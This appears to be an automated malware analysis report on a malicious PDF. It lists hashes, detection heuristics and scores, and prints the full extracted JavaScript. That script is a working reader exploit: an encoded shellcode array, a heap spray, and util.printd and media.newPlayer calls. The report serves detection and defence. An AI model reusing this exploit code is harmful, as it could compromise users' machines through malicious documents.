Malicious PDF — malware analysis report

Static analysis result for SHA-256 da10528dc484642a…

MALICIOUS

PDF

1.4 KB First seen: 2026-05-10
MD5: 2dd5e960c275f6b8bf6f24e19861cc61 SHA-1: b1aaf7c1a288eb43aea0d2530d804909ef8a3efc SHA-256: da10528dc484642a8f600d2035c65edba9fd7d8f9fe548eef366b15b13031f14
148 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 Scripting: JavaScript

The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The PDF_UNESCAPE heuristic suggests the JavaScript is obfuscated, a common technique to evade detection. The extracted artifact 'javascript_obj0005_000.js' is also flagged as suspicious due to script obfuscation indicators. The likely intent is to execute malicious code, potentially exploiting a PDF reader vulnerability or downloading a second-stage payload.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9998

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    var Wo1 = ["EB","54","8B","75","3C","8B","74","35","78","03","F5","56","8B","76","20","03","F5","33","C9","49","41","AD","33","DB","36","0F","BE","14","28","38","F2","74","08","C1","CB","0D","03","DA","40","EB","EF","3B","DF","75","E7","5E","8B","5E","24","03","DD","66","8B","0C","4B","8B","5E","1C","03","DD","8B","04","8B","03","C5","C3","75","72","6C","6D","6F","6E","2E","64","6C","6C","00","43","3A","5C","55","2E","65","78","65","00","33","C0","64","03","40","30","78","0C","8B","40","0C","8B" …
var Wo0=""; for(i=0;i<Wo1.length;){Wo0=Wo0+'%u'+Wo1[i+1]+Wo1[i]; i=i+2;} var Wo = unescape(Wo0); var yR = unescape('%u3727%u27f5');
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0005_000.js pdf-javascript-stream PDF /JS object 5 at offset 0x156 2078 bytes
SHA-256: c9883edfd9b410f3f593f9ff5aeb7f1830b465c50c45abe194c9ae2db49740fb
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var Wo1 = ["EB","54","8B","75","3C","8B","74","35","78","03","F5","56","8B","76","20","03","F5","33","C9","49","41","AD","33","DB","36","0F","BE","14","28","38","F2","74","08","C1","CB","0D","03","DA","40","EB","EF","3B","DF","75","E7","5E","8B","5E","24","03","DD","66","8B","0C","4B","8B","5E","1C","03","DD","8B","04","8B","03","C5","C3","75","72","6C","6D","6F","6E","2E","64","6C","6C","00","43","3A","5C","55","2E","65","78","65","00","33","C0","64","03","40","30","78","0C","8B","40","0C","8B","70","1C","AD","8B","40","08","EB","09","8B","40","34","8D","40","7C","8B","40","3C","95","BF","8E","4E","0E","EC","E8","84","FF","FF","FF","83","EC","04","83","2C","24","3C","FF","D0","55","50","BF","33","CA","8A","5B","E8","6F","FF","FF","FF","8B","DC","83","C3","10","53","BB","78","56","34","12","81","EB","54","46","34","12","53","FF","D0","BF","38","22","AC","E7","E8","51","FF","FF","FF","8B","DC","83","C3","10","53","6A","21","E8","00","00","00","00","59","83","C1","53","90","51","53","FF","D0","8B","2C","24","BF","36","1A","2F","70","E8","2E","FF","FF","FF","8B","D4","83","C2","10","33","DB","53","53","52","EB","2C","5B","83","C3","03","53","33","DB","53","FF","D0","5D","5D","BF","98","FE","8A","0E","E8","0C","FF","FF","FF","89","24","24","80","04","24","08","FF","D0","BF","7E","D8","E2","73","E8","F9","FE","FF","FF","52","FF","D0","E8","CF","FF","FF","FF","70","66","00","68","3A","5C","77","69","6E","64","6F","77","73","5C","73","79","73","74","65","6D","33","32","5C","63","61","6C","63","2E","65","78","65","00","00"];
var Wo0=""; for(i=0;i<Wo1.length;){Wo0=Wo0+'%u'+Wo1[i+1]+Wo1[i]; i=i+2;} var Wo = unescape(Wo0); var yR = unescape('%u3727%u27f5');

for(i=0;i<15;){yR+=yR;i ++;}
yR=yR.substring(0,32768 - Wo.length);

memory=new Array();

for(i=0;i<0x2000;) {
	memory[i]= yR + Wo; i ++;
}

util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());
util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());
try {var obj = this.media;obj['new'+'Player'](null);} catch(e) {}
util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());

Open this report in the interactive analyzer, or submit your own file for analysis.